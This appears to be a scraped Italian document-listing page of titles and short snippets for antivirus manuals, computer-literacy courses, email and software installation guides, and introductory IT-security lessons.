Il tuo manuale d'uso. KASPERSKY ANTI-VIRUS PERSONAL 5.0 http://it.yourpdfguides.com/dref/3931638 Può anche leggere le raccomandazioni fatte nel manuale d uso, nel manuale tecnico o nella guida di installazione di KASPERSKY ANTI-VIRUS PERSONAL 5.0. Troverà le risposte a tutte sue domande sul manuale

Dettagli

ESET NOD32 Antivirus 4 per Linux Desktop. Guida all'avvio rapido

ESET NOD32 Antivirus 4 per Linux Desktop. Guida all'avvio rapido ESET NOD32 Antivirus 4 per Linux Desktop Guida all'avvio rapido ESET NOD32 Antivirus 4 fornisce una protezione all'avanguardia per il computer contro codici dannosi. Basato sul motore di scansione ThreatSense

Dettagli

Internet Protection. Dott. Paolo PAVAN. Informatica per comunicare e auto-apprendere

Internet Protection. Dott. Paolo PAVAN. Informatica per comunicare e auto-apprendere Internet Protection Dott. Paolo PAVAN Informatica per comunicare e auto-apprendere Collegarsi ad Internet: un opportunità un rischio Al giorno d oggi collegare semplicemente un computer ad Internet significa

Dettagli

Creazione Account PEC (Posta Elettronica Certificata)

Creazione Account PEC (Posta Elettronica Certificata) Creazione Account PEC (Posta Elettronica Certificata) Come già specificato, il software è stato realizzato per la gestione di account PEC (Posta Elettronica Certificata), ma consente di configurare anche

Dettagli

Informatica Corso AVANZATO

Informatica Corso AVANZATO Informatica Corso AVANZATO Internet Protection: Firewall, Virus e Spam Dott. Paolo PAVAN Collegarsi ad Internet: un opportunità un rischio Al giorno d oggi collegare semplicemente un computer ad Internet

Dettagli

-L antivirus ITALIANO Free per TUTTI-

-L antivirus ITALIANO Free per TUTTI- Vir.IT explorer Lite -L antivirus ITALIANO Free per TUTTI- Vir.IT explorer Lite è la versione gratuita (Free Edition sia in ambito privato sia in ambito azindale) della suite Vir.IT explorer PRO. Vir.IT

Dettagli

Gestione di file e uso delle applicazioni

Gestione di file e uso delle applicazioni Obiettivi del corso Gestione di file e uso delle applicazioni Conoscere gli elementi principali dell interfaccia di Windows Gestire file e cartelle Aprire salvare e chiudere un file Lavorare con le finestre

Dettagli

MODULO 7 SEZIONE 2 Utilizzo di Outlook Express 6.0 (Windows XP)

MODULO 7 SEZIONE 2 Utilizzo di Outlook Express 6.0 (Windows XP) 7.4 POSTA ELETTRONICA MODULO 7 SEZIONE 2 Utilizzo di Outlook Express 6.0 (Windows XP) prima parte 7.4.1 Concetti e termini 7.4.1.1 Capire come è strutturato un indirizzo di posta elettronica Tre parti

Dettagli

MODULO 2. Gestione dei File. Concetti base. Muoversi tra il menù dei programmi installati

MODULO 2. Gestione dei File. Concetti base. Muoversi tra il menù dei programmi installati MODULO 2 Gestione dei File MODULO 2 - GESTIONE DEI FILE 1 Concetti base Avviare e spegnere il computer Muoversi tra il menù dei programmi installati Di che risorse disponiamo? Pannello di controllo - Sistema

Dettagli

PROGRAMMA COMPLETO DI INFORMATIZZAZIONE. Partire da Zero. Usare il PC

PROGRAMMA COMPLETO DI INFORMATIZZAZIONE. Partire da Zero. Usare il PC PROGRAMMA COMPLETO DI INFORMATIZZAZIONE Hardware e Software Partire da Zero Conoscere l'hardware (i componenti interni, le porte,[ ]) Tipi di computer e dispositivi digitali in commercio (PC Desktop e

Dettagli

MODULO 2 - USO DEL COMPUTER E GESTIONE DEI FILE 38

MODULO 2 - USO DEL COMPUTER E GESTIONE DEI FILE 38 MODULO 2 - USO DEL COMPUTER E GESTIONE DEI FILE 38 Osservazione La finestra di Risorse del Computer può visualizzare i file e le cartelle come la finestra di Gestione Risorse, basta selezionare il menu

Dettagli

IL SISTEMA APPLICATIVO WORD

IL SISTEMA APPLICATIVO WORD Programma di Alfabetizzazione informatica Corso di II^ livello a.s. 2014/2015 IL SISTEMA APPLICATIVO WORD Approfondimenti del Menu pricipale di Word : inserisci, formato, strumenti Personalizzazione di

Dettagli

Uso di Avast Free 8.01

Uso di Avast Free 8.01 Uso di Avast Free 8.01 Rispetto alla precedente versione, Avast Free 8.01, creato da Avast Software, ha introdotto rilevanti modifiche nell interfaccia utente, mantenendo comunque inalterata la sua ottima

Dettagli

per Mac Guida all'avvio rapido

per Mac Guida all'avvio rapido per Mac Guida all'avvio rapido ESET Cybersecurity fornisce una protezione all'avanguardia per il computer contro codici dannosi. Basato sul motore di scansione ThreatSense introdotto per la prima volta

Dettagli

Modulo 8. Strumenti di produzione Strumenti. Gli strumenti più utilizzati per produrre pagine Web sono essenzialmente due:

Modulo 8. Strumenti di produzione Strumenti. Gli strumenti più utilizzati per produrre pagine Web sono essenzialmente due: Pagina 1 di 6 Strumenti di produzione Strumenti Gli strumenti più utilizzati per produrre pagine Web sono essenzialmente due: 1. Netscape Composer, gratuito e scaricabile da netscape.org assieme al browser

Dettagli

Guida all'installazione (Italiano) Primi passi

Guida all'installazione (Italiano) Primi passi Primi passi Guida all'installazione (Italiano) Siamo lieti che Lei abbia deciso di acquistare il nostro prodotto e speriamo che resterà pienamente soddisfatto del suo nuovo software. In caso di problemi

Dettagli

Tabella 1 - Connettività internet Connettività Apparecchiature di comunicazione Provider

Tabella 1 - Connettività internet Connettività Apparecchiature di comunicazione Provider ALLGATO 3 Tabella 1 - Connettività internet Connettività Apparecchiature di comunicazione Provider Adsl router Telecom Tabella 2 - Descrizione Personal Computer 1 Identificativo del Tipo PC Sistema operativo

Dettagli

FAQ. 1. Installazione. Messaggio hardware features are not compatible with CadLite, installation aborted

FAQ. 1. Installazione. Messaggio hardware features are not compatible with CadLite, installation aborted FAQ 1. Installazione Messaggio hardware features are not compatible with CadLite, installation aborted 1. Le caratteristiche hw non rispondono ai requisiti minimi richiesti 1. Verificare i requisiti minimi

Dettagli

PREMESSA. Procedure di protezione che, ovviamente, dovranno essere riabilitate al termine dell'installazione.

PREMESSA. Procedure di protezione che, ovviamente, dovranno essere riabilitate al termine dell'installazione. PREMESSA E' buona e comune regola che, accingendosi a installare programmi che abbiano origine certa, si proceda preliminarmente alla disattivazione di Firewall e Antivirus. Procedure di protezione che,

Dettagli

Installazione di GFI FAXmaker

Installazione di GFI FAXmaker Installazione di GFI FAXmaker Requisiti di sistema Prima di installare GFI FAXmaker, assicurarsi di soddisfare tutti i requisiti che seguono. Server FAX GFI FAXmaker: Una macchina server Windows 2000 o

Dettagli

Uso del computer e gestione dei file (Sistema operativo Linux)

Uso del computer e gestione dei file (Sistema operativo Linux) Modulo Uso del computer e gestione dei file (Sistema operativo Linux) Modulo - Uso del computer e gestione dei file, richiede che il candidato dimostri di possedere conoscenza e competenza nell uso delle

Dettagli

Impostare il browser per navigare in sicurezza Opzioni di protezione

Impostare il browser per navigare in sicurezza Opzioni di protezione Impostare il browser per navigare in sicurezza Opzioni di protezione Data la crescente necessità di sicurezza e tutela dei propri dati durante la navigazione in rete, anche gli stessi browser si sono aggiornati,

Dettagli

Insegnamento di Informatica CdS Scienze Giuridiche A.A. 2007/8. La sicurezza

Insegnamento di Informatica CdS Scienze Giuridiche A.A. 2007/8. La sicurezza Insegnamento di Informatica CdS Scienze Giuridiche A.A. 2007/8 La sicurezza Prof. Valle D.ssa Folgieri Lez 10 del 23 11.07 Informatica e sicurezza 1 La sicurezza Connessione ad Internet diventata essenziale

Dettagli

FileMaker Pro 12. Guida di FileMaker Server

FileMaker Pro 12. Guida di FileMaker Server FileMaker Pro 12 Guida di FileMaker Server 2007 2012 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker è un marchio di FileMaker,

Dettagli

CORSO 01: INFORMATICA DI BASE

CORSO 01: INFORMATICA DI BASE CORSO 01: INFORMATICA DI BASE PARTIRE DA ZERO 1.01 Hardware e Software 1.02 Conoscere l'hardware USARE IL PC con WINDOWS VISTA e 7(Seven) 1.03 Usare il sistema operativo Windows 7 e Vista 1.04 Controllare

Dettagli

Posta Elettronica con Microsoft Outlook Express II

Posta Elettronica con Microsoft Outlook Express II Posta Elettronica con Microsoft Outlook Express - II Posta Elettronica con Microsoft Outlook Express II 1. Avvio di MS Outlook Express 2. Ricezione di messaggi di posta 3. Invio di messaggi di posta 4.

Dettagli

Modulo 7 Navigazione web e comunicazione (Syllabus 5.0 Internet Explorer e Outlook Express)

Modulo 7 Navigazione web e comunicazione (Syllabus 5.0 Internet Explorer e Outlook Express) Modulo 7 Navigazione web e comunicazione (Syllabus 5.0 Internet Explorer e Outlook Express) Ricordarsi di utilizzare, dove possibile, i diversi tipi di tecniche per svolgere i compiti richiesti: 1. comandi

Dettagli

> P o w e r P N < P r i m a N o t a e B i l a n c i o

> P o w e r P N < P r i m a N o t a e B i l a n c i o > P o w e r P N < P r i m a N o t a e B i l a n c i o Guida rapida all utilizzo del software (rev. 1.5 - mercoledì 10 dicembre 2014) INSTALLAZIONE, ATTIVAZIONE E CONFIGURAZIONE INIZIALE ESECUZIONE DEL

Dettagli

Dal virus dos al virus donna

Dal virus dos al virus donna Dal virus dos al virus donna ROBERTO TURCHETTI Un virus informatico è simile ad un virus biologico: si tratta di un piccolo programma contenente una sequenza di istruzioni di cui alcune deputate alla duplicazione

Dettagli

Free Antivirus. Manuale utente

Free Antivirus. Manuale utente Free Antivirus Manuale utente Introduzione Marchio registrato e copyright Marchio registrato Windows è un marchio registrato di Microsoft Corporation negli Stati Uniti e in altri paesi. Tutti gli altri

Dettagli

3. Virus e trojan. protetto da un antivirus e da. Per evitare che il nostro computer venga. infettato da un virus o sia controllato a distanza

3. Virus e trojan. protetto da un antivirus e da. Per evitare che il nostro computer venga. infettato da un virus o sia controllato a distanza 3. Virus e trojan Per evitare che il nostro computer venga infettato da un virus o sia controllato a distanza grazie a un trojan, Windows XP dev essere protetto da un antivirus e da un antitrojan. Con

Dettagli

Quick Heal AntiVirus Pro. Duro con il malware, leggero sul PC.

Quick Heal AntiVirus Pro. Duro con il malware, leggero sul PC. Duro con il malware, leggero sul PC. Caratteristiche Quick Heal Grazie al Motore di Scansione ulteriormente migliorato, Quick Heal tiene costantemente protetto il tuo PC senza rallentarlo. DNAScan avanzato

Dettagli

Acer edatasecurity Management

Acer edatasecurity Management 1 Acer edatasecurity Management Applicando le tecnologie di crittografia più avanzate, Acer edatasecurity Management offre agli utenti Acer PC una maggiore protezione dei dati personali e la possibilità

Dettagli

Proteggi ciò che crei. Guida all avvio rapido

Proteggi ciò che crei. Guida all avvio rapido Proteggi ciò che crei Guida all avvio rapido 1 Documento aggiornato il 10.06.2013 Tramite Dr.Web CureNet! si possono eseguire scansioni antivirali centralizzate di una rete locale senza installare il programma

Dettagli

Hosting Applicativo Installazione Web Client

Hosting Applicativo Installazione Web Client Hosting Applicativo Installazione Web Client Utilizzo del portale di accesso e guida all installazione dei client Versione ridotta Marzo 2012 Hosting Applicativo Installazione Web Client 21 1 - Prerequisiti

Dettagli

Corso di Informatica

Corso di Informatica Corso di Informatica CL3 - Biotecnologie Orientarsi nel Web Prof. Mauro Giacomini Dott. Josiane Tcheuko Informatica - 2006-2007 1 Obiettivi Internet e WWW Usare ed impostare il browser Navigare in internet

Dettagli

avast! Free Antivirus 7.0 Guida rapida avast! Free Antivirus 7.0 Guida rapida

avast! Free Antivirus 7.0 Guida rapida avast! Free Antivirus 7.0 Guida rapida avast! Free Antivirus 7.0 Guida rapida 1 2 Benvenuti - avast! Free Antivirus 7.0 Il nuovo avast! Antivirus 7.0 porta varie nuove funzioni e miglioramenti che lo rendono ancora più veloce e meno avido di

Dettagli

FAXBOX. Manuale utente

FAXBOX. Manuale utente FAXBOX Manuale utente Client di posta elettronica Outlook Version 3.5.2 Sommario INFORMAZIONI SULLA DOCUMENTAZIONE...4 INFORMAZIONI SPECIFICHE DELLA PROPRIA AZIENDA...5 DAL CLIENT DI POSTA ELETTRONICA...6

Dettagli

Il computer: primi elementi

Il computer: primi elementi Il computer: primi elementi Tommaso Motta T. Motta Il computer: primi elementi 1 Informazioni Computer = mezzo per memorizzare, elaborare, comunicare e trasmettere le informazioni Tutte le informazioni

Dettagli

La sicurezza di un sistema informatico. Di Roberta Molinari

La sicurezza di un sistema informatico. Di Roberta Molinari La sicurezza di un sistema informatico Di Roberta Molinari 1 La sicurezza di un sistema informatico: gli aspetti Coincide con l insieme di accorgimenti organizzativi e tecnici che vengono adottati per

Dettagli

Accademia di Belle Arti di Catania. Corso di Informatica di Base A.A. 2006/07. Uso di Windows XP Gestione dei files Modulo 2. Farinella - Tornatore

Accademia di Belle Arti di Catania. Corso di Informatica di Base A.A. 2006/07. Uso di Windows XP Gestione dei files Modulo 2. Farinella - Tornatore Accademia di Belle Arti di Catania Corso di Informatica di Base A.A. 2006/07 Uso di Windows XP Gestione dei files Modulo 2 Farinella - Tornatore Contenuti Organizzazione e gestione di file e cartelle Funzioni

Dettagli

Cosa devo fare? Capitolo Pagina Prima della sostituzione. Ho caricato tutti i dati archiviati di Outlook (.pst) che sono necessari 3.

Cosa devo fare? Capitolo Pagina Prima della sostituzione. Ho caricato tutti i dati archiviati di Outlook (.pst) che sono necessari 3. GWP W7 User Guide 04.04.2013 Validità per il rollout con 20.06.2013 Modifiche per Client LifeCycle Lista di controllo Nome computer Data migrazione Eseguito da Data sostituzione HW Cosa devo fare? Capitolo

Dettagli

HTTP, URL, LINK IPERTESTUALE, ISP, FTP

HTTP, URL, LINK IPERTESTUALE, ISP, FTP Comunicazioni Internet e World Wide Web Internet, acronimo di International Network, è una rete globale di calcolatori collegati tra loro e comunicanti attraverso un protocollo di comunicazione che permette

Dettagli

Programmazione in VBA per Office 2007

Programmazione in VBA per Office 2007 1 Antonella Carmen Turso Francesco Spalluzzi Programmazione in VBA per Office 2007 INDICE DEGLI ARGOMENTI 2 LEZIONE 1 4 CONCETTI FONDAMENTALI DELLA PROGRAMMAZIONE 4 LEZIONE 2 7 PROGRAMMAZIONE VISUALE 7

Dettagli

VIRUS: MYDOOM. Mydoom è un worm che si diffonde attraverso la posta elettronica in un messaggio con

VIRUS: MYDOOM. Mydoom è un worm che si diffonde attraverso la posta elettronica in un messaggio con VIRUS: MYDOOM 1. INTRODUZIONE: Sebbene il virus Mydoom non produca perdita di dati, abbiamo creduto opportuno realizzare questa relazione sulla sua azione per la gran ripercussione sociale che la sua enorme

Dettagli

L interfaccia. La barra delle applicazioni. MS Windows Barra delle Applicazioni

L interfaccia. La barra delle applicazioni. MS Windows Barra delle Applicazioni Windows XP In questa sezione, si desidero evidenziare le caratteristiche principali di Windows cercando possibilmente di suggerire, per quanto possibile, le strategie migliori per lavorare velocemente

Dettagli

9HURQD /DVROX]LRQH)6HFXUH XQDSLDWWDIRUPDGLVHFXULW\D SURWH]LRQHGHOODUHWHFRQWUR KDFNHUH0DOLFLRXV&RGH

9HURQD /DVROX]LRQH)6HFXUH XQDSLDWWDIRUPDGLVHFXULW\D SURWH]LRQHGHOODUHWHFRQWUR KDFNHUH0DOLFLRXV&RGH ,7HP0DJJLR 9HURQD /DVROX]LRQH)6HFXUH XQDSLDWWDIRUPDGLVHFXULW\D SURWH]LRQHGHOODUHWHFRQWUR KDFNHUH0DOLFLRXV&RGH Andrea Gradella Anti-Virus Security Division Symbolic Agenda Terminologia Caratteristiche di

Dettagli

OPERAZIONI DI MANUTENZIONE DI UN COMPUTER

OPERAZIONI DI MANUTENZIONE DI UN COMPUTER OPERAZIONI DI MANUTENZIONE DI UN COMPUTER Si sarà di certo notato che le prestazioni di un computer con il passare del tempo tendono a diminuire, sino ad arrivare a vere e proprie agonie addirittura per

Dettagli

> P o w e r A G < A g e n d a E l e t t r o n i c a

> P o w e r A G < A g e n d a E l e t t r o n i c a > P o w e r A G < A g e n d a E l e t t r o n i c a Guida rapida all utilizzo del software (rev. 2.4 - lunedì 29 ottobre 2012) INSTALLAZIONE, ATTIVAZIONE E CONFIGURAZIONE INIZIALE ESECUZIONE DEL SOFTWARE

Dettagli

Recente aumento della diffusione di virus Malware

Recente aumento della diffusione di virus Malware Recente aumento della diffusione di virus Malware Recentemente è stato registrato un aumento della diffusione di particolari tipi di virus chiamati generalmente Malware che hanno come scopo principale

Dettagli

ESET MOBILE SECURITY PER ANDROID

ESET MOBILE SECURITY PER ANDROID ESET MOBILE SECURITY PER ANDROID Manuale di installazione e Guida utente Fare clic qui per scaricare la versione più recente di questo documento Contenuti 1. Installazione...3 di ESET Mobile Security 1.1

Dettagli

Benvenuti alla Guida introduttiva - Sicurezza

Benvenuti alla Guida introduttiva - Sicurezza Benvenuti alla Guida introduttiva - Sicurezza Table of Contents Benvenuti alla Guida introduttiva - Sicurezza... 1 PC Tools Internet Security... 3 Guida introduttiva a PC Tools Internet Security... 3

Dettagli

KASPERSKY LAB. Kaspersky Mobile Security 7.0 Enterprise Edition GUIDA DELL UTENTE

KASPERSKY LAB. Kaspersky Mobile Security 7.0 Enterprise Edition GUIDA DELL UTENTE KASPERSKY LAB Kaspersky Mobile Security 7.0 Enterprise Edition GUIDA DELL UTENTE K A S P E R S K Y M O B I L E S E C U R I T Y 7. 0 E N T E R P R I S E E D I T I O N Guida dell utente Kaspersky Lab Tel/Fax:

Dettagli

PROCEDURE GENERALI ATTIVAZIONE MACRO

PROCEDURE GENERALI ATTIVAZIONE MACRO PROCEDURE GENERALI OBIETTIVO Attivazione macro GUIDA ALL UTILIZZO PREMESSA COS È UNA MACRO ATTIVAZIONE MACRO Che cos è una macro? Una macro è un automazione tramite software VBA (Visual Basic for Applications)

Dettagli

Funzioni utili - Virus e antivirus

Funzioni utili - Virus e antivirus u t o n e n i t à i m d r e n d i a p p Funzioni utili - Virus e antivirus Competenze specifiche L utilizzo della funzione Guida in linea e supporto tecnico di Windows L utilizzo della funzione Cerca per

Dettagli

Compilazione rapporto di Audit in remoto

Compilazione rapporto di Audit in remoto Compilazione rapporto di Audit in remoto Installazione e manuale utente CSI S.p.A. V.le Lombardia 20-20021 Bollate (MI) Tel. 02.383301 Fax 02.3503940 E-mail: info@csi-spa.com Rev. 1.1 23/07/09 Indice Indice...

Dettagli

Modulo 2 - ECDL. Uso del computer e gestione dei file. Fortino Luigi

Modulo 2 - ECDL. Uso del computer e gestione dei file. Fortino Luigi 1 Modulo 2 - ECDL Uso del computer e gestione dei file 2 Chiudere la sessione di lavoro 1.Fare Clic sul pulsante START 2.Cliccare sul comando SPEGNI COMPUTER 3.Selezionare una delle opzioni STANDBY: Serve

Dettagli

AMD Athlon64, Opteron o Intel EM64T Pentium 4 / Pentium 4 processore Xeon Spazio libero su hard disk: 50MB 50MB

AMD Athlon64, Opteron o Intel EM64T Pentium 4 / Pentium 4 processore Xeon Spazio libero su hard disk: 50MB 50MB 1 AVAST! 4 HOME EDITION 1.1 SPECIFICHE DEL PRODOTTO Avast! è un AntiVirus, un programma creato con lo scopo di rilevare ed eliminare virus informatici. I virus sono programmi che appartengono alla categoria

Dettagli

Guida pratica all uso di AVG Free 8.0 Adolfo Catelli

Guida pratica all uso di AVG Free 8.0 Adolfo Catelli Guida pratica all uso di AVG Free 8.0 Adolfo Catelli Introduzione AVG Free è sicuramente uno degli antivirus gratuiti più conosciuti e diffusi: infatti, secondo i dati del produttore Grisoft, questo software

Dettagli